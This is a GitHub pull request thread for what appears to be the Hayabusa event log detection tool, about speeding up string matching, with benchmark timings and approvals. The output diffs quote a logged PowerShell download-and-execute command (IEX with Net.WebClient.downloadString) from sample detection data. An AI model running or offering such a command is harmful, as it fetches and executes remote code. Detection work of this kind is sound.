### PR TITLE
Improve speed by str contains method

### PR DESCRIPTION
**Pull request by hitenkoku**
## What Changed

- updated compact_str crate
- replace contains method with memmem crate
- replace replace method with ahocorasick crate in afterfact

### CODE REVIEW

**Review by fukusuket — CHANGES_REQUESTED** [review]
I confirmed that the speed is increased as follows!!💪 
- hayabusa-sample-evtx
  - main
    - 1. Elapsed time: 00:00:07.426
    - 2. Elapsed time: 00:00:07.482
    - 3. Elapsed time: 00:00:07.474
  - This PR
    - 1. Elapsed time: 00:00:06.922
    - 2. Elapsed time: 00:00:06.950
    - 3. Elapsed time: 00:00:06.989
- [6.1GB Evtx](https://github.com/NextronSystems/evtx-baseline/releases/tag/v0.7)
  - main
    - Elapsed time: 00:06:49.945
  - This PR
    - Elapsed time: 00:06:43.158

Peformance imporvements and detection count is ok! but the result is a bit differ before/after fix as follows🤔 Could you confirm?

```
< 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,PwSh,4103,info,83422,PwSh Pipeline Exec,"Payload: CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')"""
---
> 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,PwSh,4103,info,83422,PwSh Pipeline Exec,"Payload: CommandInvocation(Out-Default): ""Out-Default""ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')"""
```
(The only difference is whether there is a space or not, so it seems that I don't have to worry too much about it...)

**Comment by hitenkoku** [comment]
@fukusuket Thank you very much for your quick review.
I will check it out.

**Comment by hitenkoku** [comment]
@fukusuket  The following corrections have been completed in https://github.com/Yamato-Security/hayabusa/pull/947/commits/6206daf2f9e60e8b0130edf122533dc68ce27c3a . Would you please check the following? 

> 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,PwSh,4103,info,83422,PwSh Pipeline Exec,"Payload: CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')"""

**Review by fukusuket — APPROVED** [review]

**Comment by fukusuket** [comment]
Thank you for the quick fix! I confirmed that the result file is same before/after fix. LGTM🚀

**Review by YamatoSecurity — APPROVED** [review]
LGTM! Thank you so much!

**Comment by YamatoSecurity** [comment]
I also noticed memory usage decreases by about 3% (12.5GB -> 12.1 GB)

**Pull request merged**
